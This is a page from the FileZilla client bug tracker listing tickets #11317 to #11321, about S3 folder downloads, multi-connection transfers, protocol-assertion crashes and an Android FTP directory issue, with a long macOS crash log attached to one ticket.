Custom Query (8214 matches)
Results (7001 - 7100 of 8214)
Ticket | Summary | Owner | Type | Priority | Component | Resolution |
---|---|---|---|---|---|---|
#11317 | Folder handling during S3 download is not correct | Bug report | normal | FileZilla Client | fixed | |
Description |
When using Filezilla Pro Client and downloading from Amazon S3 storage, handling of folders seems wrong. If you select a folder on the remote size and then try to download it, behavior is inconsistent:
In case 2, I believe expected behavior is for FileZilla to create the missing folder and proceed. This would be consistent with its behavior for FTP sources. |
|||||
#11318 | Multi-Threaded or multi-connection uploads/downloads | Feature request | normal | FileZilla Client | rejected | |
Description |
I really wish FileZilla would support multi-threaded uploads and downloads as some other FTP applications do. Since some sites throtle FTP bandwidth per connection, you can improve session speed by transferring multiple items at once (4 is a good balanced number). If however you only have one large item, throtteled connection speed makes the process long and frustrating, especially if there is a connection timeout limitation on the server. Please consider this option in future FileZilla releases. |
|||||
#11319 | MinGW Runtime Assertion if wrong protocol is in servername | Bug report | normal | FileZilla Client | duplicate | |
Description |
If you put the wrong protocol in the field of the server FileZilla shows a MinGW error and closes if you click on cancel. On ignore the right error message appears. |
|||||
#11320 | Cannot open 'SD Card' directory by double-clicking | Bug report | normal | FileZilla Client | rejected | |
Description |
Attempting to open the directory 'SD Card' on an Andriod Marshmallow FTP server fails : Commande : CWD / Réponse : 250 CWD successful Commande : PWD Réponse : 257 "/" Commande : CWD SD Card Réponse : 550 Can't CWD to invalid directory Typing 'SD Card' in the 'Remote site' edit box and hitting return works fine and changes to the directory SD Card. |
|||||
#11321 | Crash when specifying unsupported protocol | Bug report | normal | FileZilla Client | duplicate | |
Description |
I'm using the standard FileZilla binary version 3.26.2 (Compiled for/on x86_64-apple-darwin16.5.0 on 2017-06-12) (Compiler: Apple LLVM 8.1.0 clang-802.0.42) (Flags -Werror=partial-availability -Wall -g -std=gnu++14) (Linked against wxWidgets 3.0.4, GnuTLS 3.5.13, SQLite 3.19.3) How to reproduce:
The problem lies in "FileZilla3/src/engine/server.cpp, line 245", in "SetProtocol". The client asserts that the protocol isn't UNKNOWN, but in fact it is. Anyway, here's the complete log. Process: filezilla [9184] Path: /Applications/FileZilla.app/Contents/MacOS/filezilla Identifier: de.filezilla Version: 3.26.2 (3.26.2) Code Type: X86-64 (Native) Parent Process: ??? [1] Responsible: filezilla [9184] User ID: 501 Date/Time: 2017-07-09 22:38:41.380 +0200 OS Version: Mac OS X 10.12.5 (16F73) Report Version: 12 Anonymous UUID: D5195AA8-2C20-B59F-FED8-3CB6F5A0A9A4 Sleep/Wake UUID: 07D871DF-ACE2-4396-9014-7C7DAFC1F5EC Time Awake Since Boot: 39000 seconds Time Since Wake: 2300 seconds System Integrity Protection: enabled Crashed Thread: 0 Dispatch queue: com.apple.main-thread Exception Type: EXC_CRASH (SIGABRT) Exception Codes: 0x0000000000000000, 0x0000000000000000 Exception Note: EXC_CORPSE_NOTIFY Application Specific Information: Assertion failed: (serverProtocol != UNKNOWN), function SetProtocol, file ../../../../packages/FileZilla3/src/engine/server.cpp, line 245. Thread 0 Crashed:: Dispatch queue: com.apple.main-thread 0 libsystem_kernel.dylib 0x00007fffc7456d42 __pthread_kill + 10 1 libsystem_pthread.dylib 0x00007fffc7544457 pthread_kill + 90 2 libsystem_c.dylib 0x00007fffc73bc420 abort + 129 3 libsystem_c.dylib 0x00007fffc7383893 __assert_rtn + 320 4 de.filezilla 0x000000010068750e 0x100000000 + 6845710 5 de.filezilla 0x000000010031ad67 0x100000000 + 3255655 6 de.filezilla 0x0000000100318db5 0x100000000 + 3247541 7 de.filezilla 0x000000010026c0c9 0x100000000 + 2539721 8 de.filezilla 0x0000000100bd8d2f 0x100000000 + 12422447 9 de.filezilla 0x0000000100bd9a2a 0x100000000 + 12425770 10 de.filezilla 0x0000000100bd9927 0x100000000 + 12425511 11 de.filezilla 0x0000000100b13fd6 0x100000000 + 11616214 12 de.filezilla 0x0000000100bd99a7 0x100000000 + 12425639 13 de.filezilla 0x0000000100bd9ccf 0x100000000 + 12426447 14 de.filezilla 0x0000000100a3a052 0x100000000 + 10723410 15 de.filezilla 0x0000000100bd8d2f 0x100000000 + 12422447 16 de.filezilla 0x0000000100bd9a2a 0x100000000 + 12425770 17 de.filezilla 0x0000000100bd9927 0x100000000 + 12425511 18 de.filezilla 0x0000000100bd9ccf 0x100000000 + 12426447 19 de.filezilla 0x0000000100a1f494 0x100000000 + 10613908 20 de.filezilla 0x0000000100a915c2 0x100000000 + 11081154 21 de.filezilla 0x0000000100a8406e 0x100000000 + 11026542 22 de.filezilla 0x0000000100a8476f 0x100000000 + 11028335 23 com.apple.AppKit 0x00007fffaf860340 -[NSTextField textView:doCommandBySelector:] + 95 24 com.apple.AppKit 0x00007fffaf860291 -[NSTextView doCommandBySelector:] + 154 25 com.apple.AppKit 0x00007fffaf8601d1 -[NSTextInputContext(NSInputContext_WithCompletion) doCommandBySelector:completionHandler:] + 118 26 com.apple.AppKit 0x00007fffaf83de00 -[NSKeyBindingManager(NSKeyBindingManager_MultiClients) interpretEventAsCommand:forClient:] + 2218 27 com.apple.AppKit 0x00007fffb007f7b1 __84-[NSTextInputContext _handleEvent:options:allowingSyntheticEvent:completionHandler:]_block_invoke.1096 + 355 28 com.apple.AppKit 0x00007fffb007f5e5 __84-[NSTextInputContext _handleEvent:options:allowingSyntheticEvent:completionHandler:]_block_invoke_3 + 80 29 com.apple.AppKit 0x00007fffaf845f59 -[NSTextInputContext tryHandleEvent_HasMarkedText_withDispatchCondition:dispatchWork:continuation:] + 93 30 com.apple.AppKit 0x00007fffb007f560 __84-[NSTextInputContext _handleEvent:options:allowingSyntheticEvent:completionHandler:]_block_invoke.1086 + 262 31 com.apple.HIToolbox 0x00007fffb114289f __TSMProcessRawKeyEventWithOptionsAndCompletionHandler_block_invoke_5 + 70 32 com.apple.HIToolbox 0x00007fffb11416e2 ___ZL23DispatchEventToHandlersP14EventTargetRecP14OpaqueEventRefP14HandlerCallRec_block_invoke + 108 33 com.apple.AppKit 0x00007fffb00784f8 __55-[NSTextInputContext handleTSMEvent:completionHandler:]_block_invoke.314 + 2874 34 com.apple.AppKit 0x00007fffaf83f835 __55-[NSTextInputContext handleTSMEvent:completionHandler:]_block_invoke_2 + 80 35 com.apple.AppKit 0x00007fffaf83f7b4 -[NSTextInputContext tryHandleTSMEvent_HasMarkedText_withDispatchCondition:dispatchWork:continuation:] + 93 36 com.apple.AppKit 0x00007fffaf83f19f -[NSTextInputContext handleTSMEvent:completionHandler:] + 2221 37 com.apple.AppKit 0x00007fffaf83e883 _NSTSMEventHandler + 321 38 com.apple.HIToolbox 0x00007fffb10e7d85 DispatchEventToHandlers(EventTargetRec*, OpaqueEventRef*, HandlerCallRec*) + 1708 39 com.apple.HIToolbox 0x00007fffb10e6ff6 SendEventToEventTargetInternal(OpaqueEventRef*, OpaqueEventTargetRef*, HandlerCallRec*) + 428 40 com.apple.HIToolbox 0x00007fffb10e6e3f SendEventToEventTargetWithOptions + 43 41 com.apple.HIToolbox 0x00007fffb113e6d6 SendTSMEvent_WithCompletionHandler + 408 42 com.apple.HIToolbox 0x00007fffb113ebb1 __SendUnicodeTextAEToUnicodeDoc_WithCompletionHandler_block_invoke + 400 43 com.apple.HIToolbox 0x00007fffb113ea12 __SendFilterTextEvent_WithCompletionHandler_block_invoke + 215 44 com.apple.HIToolbox 0x00007fffb113e727 SendTSMEvent_WithCompletionHandler + 489 45 com.apple.HIToolbox 0x00007fffb113e511 SendFilterTextEvent_WithCompletionHandler + 236 46 com.apple.HIToolbox 0x00007fffb113e1d6 SendUnicodeTextAEToUnicodeDoc_WithCompletionHandler + 284 47 com.apple.HIToolbox 0x00007fffb113df8c __utDeliverTSMEvent_WithCompletionHandler_block_invoke_2 + 296 48 com.apple.HIToolbox 0x00007fffb113de32 __utDeliverTSMEvent_WithCompletionHandler_block_invoke + 439 49 com.apple.HIToolbox 0x00007fffb113dbf9 TSMKeyEvent_WithCompletionHandler + 632 50 com.apple.HIToolbox 0x00007fffb113d948 __TSMProcessRawKeyEventWithOptionsAndCompletionHandler_block_invoke_4 + 251 51 com.apple.HIToolbox 0x00007fffb113d775 __TSMProcessRawKeyEventWithOptionsAndCompletionHandler_block_invoke_3 + 281 52 com.apple.HIToolbox 0x00007fffb113d48b __TSMProcessRawKeyEventWithOptionsAndCompletionHandler_block_invoke_2 + 308 53 com.apple.HIToolbox 0x00007fffb113d1c2 __TSMProcessRawKeyEventWithOptionsAndCompletionHandler_block_invoke + 300 54 com.apple.HIToolbox 0x00007fffb113c73a TSMProcessRawKeyEventWithOptionsAndCompletionHandler + 3604 55 com.apple.AppKit 0x00007fffb007f3d1 __84-[NSTextInputContext _handleEvent:options:allowingSyntheticEvent:completionHandler:]_block_invoke.1077 + 116 56 com.apple.AppKit 0x00007fffb007e689 __204-[NSTextInputContext tryTSMProcessRawKeyEvent_orSubstitution:dispatchCondition:setupForDispatch:furtherCondition:doubleSpaceSubstitutionCondition:doubleSpaceSubstitutionWork:dispatchTSMWork:continuation:]_block_invoke.1003 + 121 57 com.apple.AppKit 0x00007fffb007e4f3 -[NSTextInputContext tryTSMProcessRawKeyEvent_orSubstitution:dispatchCondition:setupForDispatch:furtherCondition:doubleSpaceSubstitutionCondition:doubleSpaceSubstitutionWork:dispatchTSMWork:continuation:] + 285 58 com.apple.AppKit 0x00007fffb007ee1b -[NSTextInputContext _handleEvent:options:allowingSyntheticEvent:completionHandler:] + 1515 59 com.apple.AppKit 0x00007fffb007e362 -[NSTextInputContext _handleEvent:allowingSyntheticEvent:] + 114 60 com.apple.AppKit 0x00007fffaf83d28b -[NSView interpretKeyEvents:] + 232 61 com.apple.AppKit 0x00007fffaf83d0a1 -[NSTextView keyDown:] + 704 62 de.filezilla 0x0000000100a83e9d 0x100000000 + 11026077 63 com.apple.AppKit 0x00007fffaff9f2cc -[NSWindow(NSEventRouting) _reallySendEvent:isDelayedEvent:] + 4086 64 com.apple.AppKit 0x00007fffaff9df0a -[NSWindow(NSEventRouting) sendEvent:] + 541 65 de.filezilla 0x0000000100a7f995 0x100000000 + 11008405 66 com.apple.AppKit 0x00007fffafe234a8 -[NSApplication(NSEvent) sendEvent:] + 4768 67 de.filezilla 0x0000000100a109e2 0x100000000 + 10553826 68 com.apple.AppKit 0x00007fffaf69d427 -[NSApplication run] + 1002 69 de.filezilla 0x0000000100a7623e 0x100000000 + 10969662 70 de.filezilla 0x0000000100bc5e54 0x100000000 + 12344916 71 de.filezilla 0x0000000100b6c7e8 0x100000000 + 11978728 72 de.filezilla 0x0000000100b49c00 0x100000000 + 11836416 73 de.filezilla 0x0000000100a4268a 0x100000000 + 10757770 74 de.filezilla 0x0000000100b8a300 0x100000000 + 12100352 75 de.filezilla 0x00000001000af3e6 0x100000000 + 717798 76 libdyld.dylib 0x00007fffc7328235 start + 1 Thread 1: 0 libsystem_kernel.dylib 0x00007fffc745744e __workq_kernreturn + 10 1 libsystem_pthread.dylib 0x00007fffc7541621 _pthread_wqthread + 1426 2 libsystem_pthread.dylib 0x00007fffc754107d start_wqthread + 13 Thread 2: 0 libsystem_kernel.dylib 0x00007fffc745744e __workq_kernreturn + 10 1 libsystem_pthread.dylib 0x00007fffc754148e _pthread_wqthread + 1023 2 libsystem_pthread.dylib 0x00007fffc754107d start_wqthread + 13 Thread 3: 0 libsystem_kernel.dylib 0x00007fffc745744e __workq_kernreturn + 10 1 libsystem_pthread.dylib 0x00007fffc7541621 _pthread_wqthread + 1426 2 libsystem_pthread.dylib 0x00007fffc754107d start_wqthread + 13 Thread 4:: com.apple.NSEventThread 0 libsystem_kernel.dylib 0x00007fffc744f34a mach_msg_trap + 10 1 libsystem_kernel.dylib 0x00007fffc744e797 mach_msg + 55 2 com.apple.CoreFoundation 0x00007fffb1baf434 __CFRunLoopServiceMachPort + 212 3 com.apple.CoreFoundation 0x00007fffb1bae8c1 __CFRunLoopRun + 1361 4 com.apple.CoreFoundation 0x00007fffb1bae114 CFRunLoopRunSpecific + 420 5 com.apple.AppKit 0x00007fffaf7f5f02 _NSEventThread + 205 6 libsystem_pthread.dylib 0x00007fffc754193b _pthread_body + 180 7 libsystem_pthread.dylib 0x00007fffc7541887 _pthread_start + 286 8 libsystem_pthread.dylib 0x00007fffc754108d thread_start + 13 Thread 5: 0 libsystem_pthread.dylib 0x00007fffc7541070 start_wqthread + 0 1 ??? 0x8a3676366d364436 0 + 9959277602109015094 Thread 6: 0 libsystem_kernel.dylib 0x00007fffc7456bf2 __psynch_cvwait + 10 1 libsystem_pthread.dylib 0x00007fffc75427fa _pthread_cond_wait + 712 2 de.filezilla 0x000000010079aba0 0x100000000 + 7973792 3 de.filezilla 0x0000000100784572 0x100000000 + 7882098 4 de.filezilla 0x00000001007a606e 0x100000000 + 8020078 5 de.filezilla 0x00000001007a6c11 0x100000000 + 8023057 6 libsystem_pthread.dylib 0x00007fffc754193b _pthread_body + 180 7 libsystem_pthread.dylib 0x00007fffc7541887 _pthread_start + 286 8 libsystem_pthread.dylib 0x00007fffc754108d thread_start + 13 Thread 7: 0 libsystem_kernel.dylib 0x00007fffc7456bf2 __psynch_cvwait + 10 1 libsystem_pthread.dylib 0x00007fffc75427fa _pthread_cond_wait + 712 2 de.filezilla 0x000000010079aba0 0x100000000 + 7973792 3 de.filezilla 0x0000000100710c39 fz::socket_thread::idle_loop(fz::scoped_lock&) + 329 4 de.filezilla 0x00000001007109b0 fz::socket_thread::entry() + 352 5 de.filezilla 0x0000000100710848 fz::socket_thread::start()::'lambda'()::operator()() const + 24 6 de.filezilla 0x000000010071081d void std::__1::__invoke_void_return_wrapper<void>::__call<fz::socket_thread::start()::'lambda'()&>(fz::socket_thread::start()::'lambda'()&&&) + 45 7 de.filezilla 0x0000000100710709 0x100000000 + 7407369 8 de.filezilla 0x00000001007a8cee 0x100000000 + 8031470 9 de.filezilla 0x00000001007a88d6 0x100000000 + 8030422 10 de.filezilla 0x00000001007a606e 0x100000000 + 8020078 11 de.filezilla 0x00000001007a6c11 0x100000000 + 8023057 12 libsystem_pthread.dylib 0x00007fffc754193b _pthread_body + 180 13 libsystem_pthread.dylib 0x00007fffc7541887 _pthread_start + 286 14 libsystem_pthread.dylib 0x00007fffc754108d thread_start + 13 Thread 0 crashed with X86 Thread State (64-bit): rax: 0x0000000000000000 rbx: 0x0000000000000006 rcx: 0x00007fff5fbf96c8 rdx: 0x0000000000000000 rdi: 0x0000000000000307 rsi: 0x0000000000000006 rbp: 0x00007fff5fbf96f0 rsp: 0x00007fff5fbf96c8 r8: 0x0000000000000000 r9: 0x00000000000000f5 r10: 0x0000000008000000 r11: 0x0000000000000206 r12: 0x000000010ac88028 r13: 0x000000010ac88000 r14: 0x00007fffd02423c0 r15: 0x0000000100dbba3e rip: 0x00007fffc7456d42 rfl: 0x0000000000000206 cr2: 0x00007fffd0224128 Logical CPU: 0 Error Code: 0x02000148 Trap Number: 133 Binary Images: 0x100000000 - 0x100eddfdf +de.filezilla (3.26.2 - 3.26.2) <87A84BAF-4577-35DD-B8BE-F450D9341621> /Applications/FileZilla.app/Contents/MacOS/filezilla 0x105615000 - 0x10563ffff GLRendererFloat (14.0.16) <8D11C08E-8249-38DB-9856-BFC01EEDE0CB> /System/Library/Frameworks/OpenGL.framework/Resources/GLRendererFloat.bundle/GLRendererFloat 0x107af3000 - 0x107c99fff GLEngine (14.0.16) <1999FBF9-0B82-34B1-8876-87B4F82101BB> /System/Library/Frameworks/OpenGL.framework/Resources/GLEngine.bundle/GLEngine 0x107f17000 - 0x107f18ff1 +cl_kernels (???) <3C27554E-2DD3-493E-885D-2A0A479123B4> cl_kernels 0x108800000 - 0x108d4fff7 com.apple.driver.AppleIntelBDWGraphicsGLDriver (10.25.13 - 10.2.5) <3A433317-B62E-3DF2-B612-DDEDC75862AA> /System/Library/Extensions/AppleIntelBDWGraphicsGLDriver.bundle/Contents/MacOS/AppleIntelBDWGraphicsGLDriver 0x108f6a000 - 0x108fe9fff com.apple.driver.AppleIntelBDWGraphicsMTLDriver (10.25.13 - 10.2.5) <405EB5A7-AB50-38E8-AF51-E03FB06E1AB1> /System/Library/Extensions/AppleIntelBDWGraphicsMTLDriver.bundle/Contents/MacOS/AppleIntelBDWGraphicsMTLDriver 0x10acdf000 - 0x10ad1cdc7 dyld (433.5) <322C06B7-8878-311D-888C-C8FD2CA96FF3> /usr/lib/dyld 0x10e500000 - 0x10e520fff com.apple.CoreNLP (1.0 - 78.2) <B686BDA2-A162-3D70-9257-FEB0592DBD7E> /System/Library/PrivateFrameworks/CoreNLP.framework/Versions/A/CoreNLP 0x10f2af000 - 0x10f395fff unorm8_bgra.dylib (2.8.5) <74CB9618-8EDC-336E-A994-C5A1612BD32E> /System/Library/Frameworks/OpenCL.framework/Versions/A/Libraries/ImageFormats/unorm8_bgra.dylib 0x7fffae684000 - 0x7fffae684fff com.apple.Accelerate (1.11 - Accelerate 1.11) <916E360F-323C-3AE1-AB3D-D1F3B284AEE9> /System/Library/Frameworks/Accelerate.framework/Versions/A/Accelerate 0x7fffae685000 - 0x7fffae69cffb libCGInterfaces.dylib (331.5) <17109679-A284-3C72-AA60-DBA815D3062B> /System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vImage.framework/Versions/A/Libraries/libCGInterfaces.dylib 0x7fffae69d000 - 0x7fffaebb6feb com.apple.vImage (8.1 - ???) <B58A7937-BEE2-38FE-87F4-5D5F40D31DC9> /System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vImage.framework/Versions/A/vImage 0x7fffaebb7000 - 0x7fffaed28ff3 libBLAS.dylib (1185.50.4) <4087FFE0-627E-3623-96B4-F0A9A1991E09> /System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libBLAS.dylib 0x7fffaed29000 - 0x7fffaed3dffb libBNNS.dylib (15) <254698C7-7D36-3FFF-864E-ADEEEE543076> /System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libBNNS.dylib 0x7fffaed3e000 - 0x7fffaf134fef libLAPACK.dylib (1185.50.4) <C35FFB2F-A0E6-3903-8A3C-113A74BCBCA2> /System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libLAPACK.dylib 0x7fffaf135000 - 0x7fffaf14bfff libLinearAlgebra.dylib (1185.50.4) <345CAACF-7263-36EF-B69B-793EA8B390AF> /System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libLinearAlgebra.dylib 0x7fffaf14c000 - 0x7fffaf152fff libQuadrature.dylib (3) <EF56C8E6-DE22-3C69-B543-A8648F335FDD> /System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libQuadrature.dylib 0x7fffaf153000 - 0x7fffaf167ff7 libSparseBLAS.dylib (1185.50.4) <67BA432E-FB59-3C78-A8BE-ED4274CBC359> /System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libSparseBLAS.dylib 0x7fffaf168000 - 0x7fffaf2effe7 libvDSP.dylib (600.60.1) <4155F45B-41CD-3782-AE8F-7AE740FD83C3> /System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libvDSP.dylib 0x7fffaf2f0000 - 0x7fffaf3a2fff libvMisc.dylib (600.60.1) <98F27D2D-E5DD-38EF-8747-0C4DE821A23D> /System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libvMisc.dylib 0x7fffaf3a3000 - 0x7fffaf3a3fff com.apple.Accelerate.vecLib (3.11 - vecLib 3.11) <7C5733E7-0568-3E7D-AF61-160F19FED544> /System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/vecLib 0x7fffaf662000 - 0x7fffb043bff3 com.apple.AppKit (6.9 - 1504.83.101) <EC7BD195-F9E1-3E43-820A-5FDD0B2B0B67> /System/Library/Frameworks/AppKit.framework/Versions/C/AppKit 0x7fffb044d000 - 0x7fffb044dfff com.apple.ApplicationServices (48 - 48) <4C71CBA8-47E4-38BF-BE3B-F20DF8667D5D> /System/Library/Frameworks/ApplicationServices.framework/Versions/A/ApplicationServices 0x7fffb044e000 - 0x7fffb04bcff7 com.apple.ApplicationServices.ATS (377 - 422.2) <A31D17BE-F747-39FB-9A84-5F2F8891204C> /System/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/ATS.framework/Versions/A/ATS 0x7fffb0556000 - 0x7fffb0685ff7 libFontParser.dylib (194.12) <73C3946D-EF92-3AC1-89C3-0E75B2A85325> /System/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/ATS.framework/Versions/A/Resources/libFontParser.dylib 0x7fffb0686000 - 0x7fffb06d0fff libFontRegistry.dylib (196.4) <EA96AE47-3369-3DEA-BB82-98348ADBD85B> /System/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/ATS.framework/Versions/A/Resources/libFontRegistry.dylib 0x7fffb072d000 - 0x7fffb0760fff libTrueTypeScaler.dylib (194.12) <8944A23A-EE36-3657-9B4F-933231C8FDEC> /System/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/ATS.framework/Versions/A/Resources/libTrueTypeScaler.dylib 0x7fffb07cd000 - 0x7fffb0877ff7 com.apple.ColorSync (4.12.0 - 502.2) <ACA4001E-A0E3-33F6-9CD6-EEC2AA15E322> /System/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/ColorSync.framework/Versions/A/ColorSync 0x7fffb0878000 - 0x7fffb08c9fff com.apple.HIServices (1.22 - 592.1) <7353E76E-9A3A-3693-87AF-41953585E024> /System/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/HIServices.framework/Versions/A/HIServices 0x7fffb08ca000 - 0x7fffb08d9ff3 com.apple.LangAnalysis (1.7.0 - 1.7.0) <2CBE7F61-2056-3F96-99A1-0D527796AFA6> /System/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/LangAnalysis.framework/Versions/A/LangAnalysis 0x7fffb08da000 - 0x7fffb0927fff com.apple.print.framework.PrintCore (12 - 491) <5027FD58-F0EE-33E4-8577-934CA06CD2AF> /System/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/PrintCore.framework/Versions/A/PrintCore 0x7fffb0928000 - 0x7fffb0963fff com.apple.QD (3.12 - 313) <B339C41D-8CDF-3342-8414-F9717DCCADD4> /System/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/QD.framework/Versions/A/QD 0x7fffb0964000 - 0x7fffb096ffff com.apple.speech.synthesis.framework (6.6.2 - 6.6.2) <7853EFF4-62B9-394E-B7B8-41A645656820> /System/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/SpeechSynthesis.framework/Versions/A/SpeechSynthesis 0x7fffb0970000 - 0x7fffb0b7cfff com.apple.audio.toolbox.AudioToolbox (1.14 - 1.14) <91D2BA22-B168-3A9A-9008-6FFC5A8FDC1E> /System/Library/Frameworks/AudioToolbox.framework/Versions/A/AudioToolbox 0x7fffb0b7d000 - 0x7fffb0b7dfff com.apple.audio.units.AudioUnit (1.14 - 1.14) <8C0153FD-FEFF-309C-AACD-BF9657A31F8E> /System/Library/Frameworks/AudioUnit.framework/Versions/A/AudioUnit 0x7fffb0ce6000 - 0x7fffb10c0fff com.apple.CFNetwork (811.5.4 - 811.5.4) <4DBF8932-6286-3B23-87D9-63615B9958D9> /System/Library/Frameworks/CFNetwork.framework/Versions/A/CFNetwork 0x7fffb10da000 - 0x7fffb10dafff com.apple.Carbon (154 - 157) <69F403C7-F0CB-34E6-89B0-235CF4978C17> /System/Library/Frameworks/Carbon.framework/Versions/A/Carbon 0x7fffb10db000 - 0x7fffb10defff com.apple.CommonPanels (1.2.6 - 98) <BF04BB22-D54C-309E-9F5C-897D969CAF70> /System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/CommonPanels.framework/Versions/A/CommonPanels 0x7fffb10df000 - 0x7fffb13e8fff com.apple.HIToolbox (2.1.1 - 857.8) <CAB143FE-AEAF-3EDE-AD7B-C04E1B7C5615> /System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox 0x7fffb13e9000 - 0x7fffb13ecff7 com.apple.help (1.3.5 - 49) <B1A930E3-5907-3677-BACD-858EF68B172D> /System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/Help.framework/Versions/A/Help 0x7fffb13ed000 - 0x7fffb13f2fff com.apple.ImageCapture (9.0 - 9.0) <341252B4-E082-361A-B756-6A330259C741> /System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/ImageCapture.framework/Versions/A/ImageCapture 0x7fffb13f3000 - 0x7fffb148aff3 com.apple.ink.framework (10.9 - 219) <1BD40B45-FD33-3177-A935-565EE5FC79D7> /System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/Ink.framework/Versions/A/Ink 0x7fffb148b000 - 0x7fffb14a5fff com.apple.openscripting (1.7 - 172) <31CFBB35-24BD-3E12-9B6B-1FA842FB605B> /System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/OpenScripting.framework/Versions/A/OpenScripting 0x7fffb14a6000 - 0x7fffb14a7ff3 com.apple.print.framework.Print (12 - 267) <E2F82F1F-DC27-3EF0-9F75-B354F701450A> /System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/Print.framework/Versions/A/Print 0x7fffb14a8000 - 0x7fffb14aaff7 com.apple.securityhi (9.0 - 55006) <DBD65629-535D-3669-8218-7F074D61638C> /System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/SecurityHI.framework/Versions/A/SecurityHI 0x7fffb14ab000 - 0x7fffb14b1ff7 com.apple.speech.recognition.framework (6.0.1 - 6.0.1) <082895DC-3AC7-3DEF-ADCA-5B018C19C9D3> /System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/SpeechRecognition.framework/Versions/A/SpeechRecognition 0x7fffb14b2000 - 0x7fffb1591ffb com.apple.cloudkit.CloudKit (651.14 - 651.14) <9F901E45-23E3-3F45-B66F-1BAB3AFC4462> /System/Library/Frameworks/CloudKit.framework/Versions/A/CloudKit 0x7fffb1592000 - 0x7fffb1592fff com.apple.Cocoa (6.11 - 22) <85EDFBE1-75F0-369E-8CA8-C6A639B98FA6> /System/Library/Frameworks/Cocoa.framework/Versions/A/Cocoa 0x7fffb16dc000 - 0x7fffb1769fff com.apple.audio.CoreAudio (4.3.0 - 4.3.0) <78767F88-91D4-31CE-AAC6-1F9407F479BB> /System/Library/Frameworks/CoreAudio.framework/Versions/A/CoreAudio 0x7fffb176a000 - 0x7fffb177dfff com.apple.CoreBluetooth (1.0 - 1) <BCB78777-76F0-3CC1-8443-9E61AEF7EF63> /System/Library/Frameworks/CoreBluetooth.framework/Versions/A/CoreBluetooth 0x7fffb177e000 - 0x7fffb1a79fff com.apple.CoreData (120 - 754.2) <4C9CAB2C-60D4-3694-A0A0-5B04B14BD14E> /System/Library/Frameworks/CoreData.framework/Versions/A/CoreData 0x7fffb1a7a000 - 0x7fffb1b26ff7 com.apple.CoreDisplay (1.0 - 1) <AAD5DF0B-0D22-305E-86FF-BB1431130363> /System/Library/Frameworks/CoreDisplay.framework/Versions/A/CoreDisplay 0x7fffb1b27000 - 0x7fffb1fc0ff7 com.apple.CoreFoundation (6.9 - 1349.8) <09ED473E-5DE8-307F-B55C-16F6419236D5> /System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation 0x7fffb1fc1000 - 0x7fffb2643fff com.apple.CoreGraphics (2.0 - 1070.22) <78E7C882-837D-3CC3-B221-767B999873CE> /System/Library/Frameworks/CoreGraphics.framework/Versions/A/CoreGraphics 0x7fffb2644000 - 0x7fffb2887ffb com.apple.CoreImage (12.4.0 - 451.4.9) <BE4303C9-C9D9-361D-AC94-DBE40EB6700E> /System/Library/Frameworks/CoreImage.framework/Versions/A/CoreImage 0x7fffb2888000 - 0x7fffb28edff7 com.apple.corelocation (2101.0.63) <B76E6C13-E10B-3F2F-AFD7-DB2C0DEF6579> /System/Library/Frameworks/CoreLocation.framework/Versions/A/CoreLocation 0x7fffb29ec000 - 0x7fffb29ecfff com.apple.CoreServices (775.19 - 775.19) <7255917D-EFBB-3BE2-A8FD-DAD631BC0949> /System/Library/Frameworks/CoreServices.framework/Versions/A/CoreServices 0x7fffb29ed000 - 0x7fffb2a3efff com.apple.AE (712.5 - 712.5) <61F2AE2C-E04E-3FDF-9E88-201325136C83> /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/AE.framework/Versions/A/AE 0x7fffb2a3f000 - 0x7fffb2d1aff7 com.apple.CoreServices.CarbonCore (1159.6 - 1159.6) <08AC074C-965B-3EDF-8E45-0707C8DE9EAD> /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/CarbonCore.framework/Versions/A/CarbonCore 0x7fffb2d1b000 - 0x7fffb2d4efff com.apple.DictionaryServices (1.2 - 274) <D23866E2-F7C8-3984-A9D4-96552CCDE573> /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/DictionaryServices.framework/Versions/A/DictionaryServices 0x7fffb2d4f000 - 0x7fffb2d57ff3 com.apple.CoreServices.FSEvents (1230.50.1 - 1230.50.1) <2AD1B0E5-7214-37C4-8D11-A27C9CAC0F74> /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/FSEvents.framework/Versions/A/FSEvents 0x7fffb2d58000 - 0x7fffb2ec4ff7 com.apple.LaunchServices (775.19 - 775.19) <94D15A2A-852C-3B4B-A701-43043C8F1527> /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/LaunchServices.framework/Versions/A/LaunchServices 